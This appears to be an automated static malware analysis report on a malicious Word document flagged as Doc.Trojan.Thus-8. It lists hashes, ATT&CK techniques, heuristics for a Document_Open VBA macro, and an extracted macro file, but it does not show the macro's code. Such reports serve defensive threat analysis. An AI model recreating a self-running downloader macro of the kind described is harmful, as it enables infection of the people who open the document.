Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0ff8a0574a4acf03…

MALICIOUS

Office (OLE)

45.5 KB Created: 2010-04-22 13:33:00 Authoring application: Microsoft Word 11.3.8
MD5: c41c4d3d79e68c632b34e59f92e95b4b SHA-1: a33911b7ec1c4dc9118dc1dfdf5516f27e4dbad3 SHA-256: 0ff8a0574a4acf03620ba007d1f7b981adcb31533b025d5c56f07c826320b002
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV detection 'Doc.Trojan.Thus-8' strongly indicates malicious intent. The macro appears to be designed to download and execute a second-stage payload, although the full URL or execution details are truncated.

Heuristics 4

  • ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-8
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
9e0d7564540cd977337db3968daecad84f1a71282ddad42de3b7276dedf27a7f		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 2405 bytes
Detection
ClamAV: Doc.Trojan.Thus-8
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.